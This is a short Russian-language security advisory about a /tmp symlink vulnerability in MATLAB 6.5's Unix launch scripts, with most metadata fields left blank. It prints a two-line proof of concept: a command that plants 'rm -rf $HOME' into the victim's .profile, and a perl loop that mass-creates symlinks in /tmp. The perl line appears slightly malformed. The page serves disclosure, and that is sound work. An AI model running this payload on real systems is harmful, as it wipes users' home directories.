Уязвимость символьных линков в MATLAB

Дата публикации:
25.12.2002
Всего просмотров:
868
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: MATLAB – пакет программ для математических вычислений.

На Unix системах, matlab для запуска использует сценарии оболочки; эти сценарии опасно используют временные файлы (в /tmp). Уязвимость позволяет локальному непривилегированному атакующему использовать нападение символьных линков. Пример:

  echo 'echo You lose: rm -rf $HOME >> $HOME/.profile' > /tmp/evil   
perl -e 'for (1..32000) { symlink "/tmp/$_a", "/tmp/evil" }'
уязвимость обнаружена в matlab 6.5

Ссылки: Matlab /tmp usage
или введите имя

CAPTCHA